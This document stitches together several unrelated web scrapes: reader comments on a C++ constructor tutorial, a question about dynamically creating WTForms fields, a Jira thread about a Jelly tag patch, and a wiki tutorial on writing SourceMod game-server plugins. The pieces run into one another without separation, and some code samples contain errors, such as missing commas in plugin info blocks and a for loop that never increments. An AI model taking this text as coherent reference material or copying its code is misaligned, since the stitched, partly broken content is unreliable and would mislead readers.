case, the top line actually instantiates an integer. In the class case, defining an int member doesn't actually instantiate an int. See, but when we declare an object of this class, A specific amt. Of memory is instanitiated for that object. And Now, Memory is allocated for members also ! Now My question arrives, How is member m_x is defined 2 times(1st - Definition(Eg - int x;) & 2nd initialization(involves definition too(Eg - int x = 5;) or is definition and initialization done in different places in classes? That's what I've been telling you -- definition and initialization usually happen separately in classes. Can you tell me the reason why it is so different in classes? So that different constructors can initialize the members in different ways if desired. If you had to initialize the variables right where they were defined, then constructors wouldn't be near as useful. Due to the wording in your quiz, I interpreted the question in a different way than your solution provided. The first part was simple enough, if RGBA were instantiated with no arguments, then RGBA members will be initialized to 0,0,0,255 The second part says if the user passes red, green, blue and optionally alpha, then initialize the members accordingly. Due to the fact that 'optionally' is used on only alpha, that tells me that all three color components must be provided. Your solution would allow only red or only red and blue components to be provided. My solution according to my own interpretation of the question uses these two constructors. Also want to thank you for taking the time to provide these tutorials. I removed the word optionally, since I agree that was a bit confusing. 🙂 Thanks for pointing that out. Isn't this code format better, for the last question of the quiz? Yes, except it's generally considered better to put the << at the end of the previous line. I've updated the example. Thanks! Hi Alex! Very nice site, thank you so much! I would appreciate it if you would help me to solve this. If we have the following class: And the following main function: Is this correct: 1) the constructor for the object y is called (***) 2) the constructor for the object _y is called (///) 3) the assignment operator is called (###) Thanks in advance! (***) and (###) are correct. The constructor for _y is actually called here: After the function parameters are assigned, but before the body of the constructor executes. This makes sense since the definition of Yyy _y is just a definition, it's not executable code. Name (required) Website
http://www.learncpp.com/cpp-tutorial/8-5a-constructor-member-initializer-lists/comment-page-2/
CC-MAIN-2018-13
refinedweb
2,098
64.71
How I would dynamically create a few form fields with different questions, but the same answers? from wtforms import Form, RadioField from wtforms.validators import Required class VariableForm(Form): def __init__(formdata=None, obj=None, prefix='', **kwargs): super(VariableForm, self).__init__(formdata, obj, prefix, **kwargs) questions = kwargs['questions'] // How to to dynamically create three questions formatted as below? question = RadioField( # question ?, [Required()], choices = [('yes', 'Yes'), ('no', 'No')], ) questions = ("Do you like peas?", "Do you like tea?", "Are you nice?") form = VariableForm(questions = questions) It was in the docs all along. def my_view(): class F(MyBaseForm): pass F.username = TextField('username') for name in iterate_some_model_dynamically(): setattr(F, name, TextField(name.title())) form = F(request.POST, ...) # do view stuff What I didn't realize is that the class attributes must be set before any instantiation occurs. The clarity comes from this bitbucket comment: This is not a bug, it is by design. There are a lot of problems with adding fields to instantiated forms - For example, data comes in through the Form constructor. If you reread the thread you link, you'll notice you need to derive the class, add fields to that, and then instantiate the new class. Typically you'll do this inside your view handler.
https://codedump.io/share/j0hE75MOM0wh/1/wtforms-create-variable-number-of-fields
CC-MAIN-2017-47
refinedweb
206
60.41
). Activity Test cases fail after applying the patch. I'll investigate The patch was missing changes to testInvokeStaticTag.jelly and others Hmm, let me create a new patch then... Will wait for the new patch before trying again. Also, when you throw the JellyException, can you please use the constructor that takes a string and a Throwable so the original exception details are preserved? Thanks. Fixed with minor changes Here is the change you've requested - preserving the original exception. This patch appears to be a JDK 1.4 specific one. It uses Throwable.getCause() which was introduced in jdk 1.4 I'm commenting those lines out for now. Sorry, my bad, I used the wrong casts. Yes, Throwable.getCause() is JDK 1.4, but I'm using InvocationTarget.getTargetMessage() instead: I mean, there is also a call to jellyException.getCause(), but JellyException defines it indenpendently on the JDK version. Anyway, I've just ran maven on it using JDK 1.3.1, and it worked fine. It's just a matter of modifying the test cases, changing the following line: from: Exception jellyException = (Exception) getJellyContext().getVariable("jellyException"); to: JellyException jellyException = (JellyException) getJellyContext().getVariable("jellyException"); And also adding a import org.apache.commons.jelly.JellyException; (Sorry, I'm not with CVS set up right now to send you a patch) Fixing now Here is the patch and a snippet of the maven test: [junit] Running org.apache.commons.jelly.core.TestInvokeStaticTag [junit] Tests run: 5, Failures: 0, Errors: 0, Time elapsed: 3.896 sec [junit] Running org.apache.commons.jelly.core.TestInvokeTag [junit] Tests run: 6, Failures: 0, Errors: 0, Time elapsed: 3.146 sec Note that I'm not sure if the tags.html has been updated correctly - I couldn't run maven site:generate
https://issues.apache.org/jira/browse/JELLY-116?focusedCommentId=37203&page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel
CC-MAIN-2014-23
refinedweb
297
53.37
Introduction to SourceMod Plugins From AMWiki This guide will give you a basic introduction to writing a SourceMod plugin. If you are not familiar with the SourcePawn language, it is recommended that you at least briefly read the Introduction to SourcePawn article. For information on compiling plugins, see Compiling SourceMod Plugins. The author of this article uses Crimson Editor to write plugins. Other possibilities are PSPad, UltraEdit, Notepad++, TextPad, or any other text editor you're comfortable with. [edit] Plugin Structure Almost all plugins follow have the same three elements: - Includes - Allows you to access the SourceMod API, and if you desire, API from external SourceMod extensions/plugins. - Info - Public information about your plugin. - Startup - A function which performs start-up routines in your plugin. A skeletal plugin structure looks like: #include <sourcemod> public Plugin:myinfo = { name = "My First Plugin", author = "Me", description = "My first plugin ever", version = "1.0.0.0", url = "" }; public OnPluginStart() { } The information portion is a special syntax construct. You cannot change any of the keywords, or the public Plugin:myinfo declaration. The best idea is to copy and paste this skeletal structure and modify the strings to get started. [edit] Includes Pawn requires include files, much like C requires header files. Include files list all of the structures, functions, callbacks, and tags that are available. There are three types of include files: - Core include files, which is sourcemod.inc and anything it includes. These are all provided by SourceMod's Core. - Extension include files, which if used, will add a dependency against a certain extension. - Plugin include files, which if used, will add a dependency against a certain plugin. Include files are loaded using the #include compiler directive. [edit] Commands Our first example will be writing a simple admin command to slap a player. We'll continue to extend this example with more features until we have a final, complete result. [edit] Declaration First, let's look at what an admin command requires. Admin commands are registered using the RegAdminCmd function. They require a name, a callback function, and default admin flags. The callback function is what's invoked every time the command is used. Click here to see its prototype. Example: public OnPluginStart() { RegAdminCmd("sm_myslap", Command_MySlap, ADMFLAG_SLAY) } public Action:Command_MySlap(client, args) { } Now we've successfully implemented a command -- though it doesn't do anything yet. In fact, it will say "Unknown command" if you use it! The reason is because of the Action tag. The default functionality for entering console commands is to reply that they are unknown. To block this functionality, you must return a new action: public Action:Command_MySlap(client, args) { return Plugin_Handled; } Now the command will report no error, but it still won't do anything. [edit] Implementation Let's decide what the command will look like. Let's have it act like the default sm_slap command: sm_myslap <name|#userid> [damage] To implement this, we'll need a few steps: - Get the input from the console. For this we use GetCmdArg(). - Find a matching player. For this we use FindTarget(). - Slap them. For this we use SlapPlayer(), which requires including sdktools, an extension bundled with SourceMod. - Respond to the admin. For this we use ReplyToCommand(). Full example: #include <sourcemod> #include <sdktools> public Plugin:myinfo = { name = "My First Plugin", author = "Me", description = "My first plugin ever" version = "1.0.0.0", url = "" } public OnPluginStart() { RegAdminCmd("sm_myslap", Command_MySlap, ADMFLAG_SLAY) } public Action:Command_MySlap(client, args) { new String:arg1[32], String:arg2[32] new) } /* Try and find a matching player */ new target = FindTarget(client, arg1) if (target == -1) { /* FindTarget() automatically replies with the * failure reason. */ return Plugin_Handled; } SlapPlayer(target, damage) new String:name[MAX_NAME_LENGTH] GetClientName(target, name, sizeof(name)) ReplyToCommand(client, "[SM] You slapped %s for %d damage!", name, damage) return Plugin_Handled; } For more information on what %s and %d are, see Format Class Functions. Note that you never need to unregister or remove your admin command. When a plugin is unloaded, SourceMod cleans it up for you. [edit] ConVars ConVars, also known as cvars, are global console variables in the Source engine. They can have integer, float, or string values. ConVar accessing is done through Handles. Since ConVars are global, you do not need to close ConVar Handles (in fact, you cannot). The handy feature of ConVars is that they are easy for users to configure. They can be placed in any .cfg file, such as server.cfg or sourcemod.cfg. To make this easier, SourceMod has an AutoExecConfig() function. This function will automatically build a default .cfg file containing all of your cvars, annotated with comments, for users. It is highly recommend that you call this if you have customizable ConVars. Let's extend your example from earlier with a new ConVar. Our ConVar will be sm_myslap_damage and will specify the default damage someone is slapped for if no damage is specified. new Handle:sm_myslap_damage = INVALID_HANDLE public OnPluginStart() {) /* The rest remains unchanged! */ [edit] Showing Activity, Logging Almost all admin commands should log their activity, and some admin commands should show their activity to in-game clients. This can be done via the LogAction() and ShowActivity2() functions. The exact functionality of ShowActivity2() is determined by the sm_show_activity cvar. For example, let's rewrite the last few lines of our slap command: SlapPlayer(target, damage) new String:name[MAX_NAME_LENGTH] GetClientName(target, name, sizeof(name)) ShowActivity2(client, "[SM] ", "Slapped %s for %d damage!", name, damage) LogAction(client, target, "\"%L\" slapped \"%L\" (damage %d)", client, target, damage) return Plugin_Handled; } [edit] Multiple Targets To fully complete our slap demonstration, let's make it support multiple targets. SourceMod's targeting system is quite advanced, so using it may seem complicated at first. The function we use is ProcessTargetString(). It takes in input from the console, and returns a list of matching clients. It also returns a noun that will identify either a single client or describe a list of clients. The idea is that each client is then processed, but the activity shown to all players is only processed once. This reduces screen spam. This method of target processing is used for almost every admin command in SourceMod, and in fact FindTarget() is just a simplified version. Full, final example: #include <sourcemod> #include <sdktools> public Plugin:myinfo = { name = "My First Plugin", author = "Me", description = "My first plugin ever" version = "1.0.0.0", url = "" } public OnPluginStart() { LoadTranslations("common.phrases")) } /** * target_name - stores the noun identifying the target(s) * target_list - array to store clients * target_count - variable to store number of clients * tn_is_ml - stores whether the noun must be translated */ new String:target_name[MAX_TARGET_LENGTH] new target_list[MAXPLAYERS], target_count new bool:tn_is_ml if ((target_count = ProcessTargetString( arg1, client, target_list, MAXPLAYERS, COMMAND_FILTER_ALIVE, /* Only allow alive players */ target_name, sizeof(target_name), tn_is_ml)) <= 0) { /* This function replies to the admin with a failure message */ ReplyToTargetError(client, target_count); return Plugin_Handled; } for (new i = 0; i < target_count) { SlapPlayer(target_list[i], damage) LogAction(client, target_list[i], "\"%L\" slapped \"%L\" (damage %d)", client, target_list[i], damage) } if (tn_is_ml) { ShowActivity2(client, "[SM] ", "Slapped %t for %d damage!", target_name, damage) } else { ShowActivity2(client, "[SM] ", "Slapped %s for %d damage!", target_name, damage) } return Plugin_Handled; } [edit] Client and Entity Indexes One major point of confusion with Half-Life 2 is the difference between the following things: - Client index - Entity index - Userid The first answer is that clients are entities. Thus, a client index and an entity index are the same thing. When a SourceMod function asks for an entity index, a client index can be specified. When a SourceMod function asks for a client index, usually it means only a client index can be specified. A fast way to check if an entity index is a client is checking whether it's between 1 and GetMaxClients() (inclusive). If a server has N client slots maximum, then entities 1 through N are always reserved for clients. Note that 0 is a valid entity index; it is the world entity (worldspawn). A userid, on the other hand, is completely different. The server maintains a global "connection count" number, and it starts at 1. Each time a client connects, the connection count is incremented, and the client receives that new number as their userid. For example, the first client to connect has a userid of 2. If he exits and rejoins, his userid will be 3 (unless another client joins in-between). Since clients are disconnected on mapchange, their userids change as well. Userids are a handy way to check if a client's connection status has changed. SourceMod provides two functions for userids: GetClientOfUserId() and GetClientUserId(). [edit] Events Events are informational notification messages passed between objects in the server. Many are also passed from the server to the client. They are defined in .res files under the hl2/resource folder and resource folders of specific mods. For a basic listing, see Source Game Events. It is important to note a few concepts about events: - They are almost always informational. That is, blocking player_death will not stop a player from dying. It may block a HUD or console message or something else minor. - They always use userids instead of client indexes. - Just because it is in a resource file does not mean it is ever called, or works the way you expect it to. Mods are notorious at not properly documenting their event functionality. An example of finding when a player dies: public OnPluginStart() { HookEvent("player_death", Event_PlayerDeath) } public Event_PlayerDeath(Handle:event, const String:name[], bool:dontBroadcast) { new victim_id = GetEventInt(event, "userid") new attacker_id = GetEventInt(event, "attacker") new victim = GetClientOfUserId(victim_id) new attacker = GetClientOfUserId(attacker_id) /* CODE */ } [edit] Callback Orders and Pairing SourceMod has a number of builtin callbacks about the state of the server and plugin. Some of these are paired in special ways which is confusing to users. [edit] Pairing Pairing is SourceMod terminology. Examples of it are: - OnMapEnd() cannot be called without an OnMapStart(), and if OnMapStart() is called, it cannot be called again without an OnMapEnd(). - OnClientConnected(N) for a given client N will only be called once, until an OnClientDisconnected(N) for the same client N is called (which is guaranteed to happen). There is a formal definition of SourceMod's pairing. For two functions X and Y, both with input A, the following conditions hold: - If X is invoked with input A, it cannot be invoked again with the same input unless Y is called with input A. - If X is invoked with input A, it is guaranteed that Y will, at some point, be called with input A. - Y cannot be invoked with any input A unless X was also called with input A. - The relationship is described as, "X is paired with Y," and "Y is paired to X." [edit] General Callbacks These callbacks are listed in the order they are called, in the lifetime of a plugin and the server. - AskPluginLoad() - Called once, immediately after the plugin is loaded from the disk. - OnPluginStart() - Called once, after the plugin has been fully initialized and can proceed to load. Any run-time errors in this function will cause the plugin to fail to load. This is paired with OnPluginEnd(). - OnMapStart() - Called every time the map loads. If the plugin is loaded late, and the map has already started, this function is called anyway after load, in order to preserve pairing. This function is paired with OnMapEnd(). - OnConfigsExecuted() - Called once per map-change after servercfgfile (usually server.cfg), sourcemod.cfg, and all plugin config files have finished executing. If a plugin is loaded after this has happened, the callback is called anyway, in order to preserve pairing. This function is paired with OnMapEnd(). - At this point, most game callbacks can occur, such as events and callbacks involving clients (or other things, like OnGameFrame). - OnMapEnd() - Called when the map is about to end. At this point, all clients are disconnected, but TIMER_NO_MAPCHANGE timers are not yet destroyed. This function is paired to OnMapStart(). - OnPluginEnd() - Called once, immediately before the plugin is unloaded. This function is paired to OnPluginStart(). [edit] Client Callbacks These callbacks are listed in no specific order, however, their documentation holds for both fake and real clients. - OnClientConnect() - Called when a player initiates a connection. This is paired with OnClientDisconnect. - OnClientAuthorized() - Called when a player gets a Steam ID. It is important to note that this may never be called. It may occur any time in between connect and disconnect. Do not rely on it unless you are writing something that needs Steam IDs, and even then you should use OnClientPostAdminCheck(). - OnClientPutInServer() - Signifies that the player is in-game and IsClientInGame() will return true. - OnClientPostAdminCheck() - Called after the player is both authorized and in-game. That is, both OnClientAuthorized() and OnClientPutInServer() have been invoked. This is the best callback for checking administrative access after connect. - OnClientDisconnect() - Called when a player's disconnection ends. This is paired to OnClientConnect. [edit] Frequently Asked Questions [edit] Are plugins reloaded every mapchange? Plugins, by default, are not reloaded on mapchange unless their timestamp changes. This is a feature so plugin authors have more flexibility with the state of their plugins. [edit] Do I need to call CloseHandle in OnPluginEnd? No. SourceMod automatically closes your Handles when your plugin is unloaded, in order to prevent memory errors. [edit] Do I need to #include every individual .inc? No. #include <sourcemod> will give you 95% of the .incs. Similarly, <sdktools> includes everything starting with <sdktools>. [edit] Why don't some events fire? There is no guarantee that events will fire. The event listing is not a specification, it is a list of the events that a game is capable of firing. Whether the game actually fires them is up to Valve or the developer. [edit] Do I need to CloseHandle timers? No. In fact, doing so may cause errors. Timers naturally die on their own unless they are infinite timers, in which case you can use KillTimer() or die gracefully by returning Plugin_Stop in the callback. [edit] Are clients disconnected on mapchange? All clients are fully disconnected before the map changes. They are all reconnected after the next map starts. [edit] Further Reading For further reading, see the "Scripting" section at the SourceMod Documentation.
http://wiki.alliedmods.net/Introduction_to_SourceMod_Plugins
crawl-001
refinedweb
2,354
57.47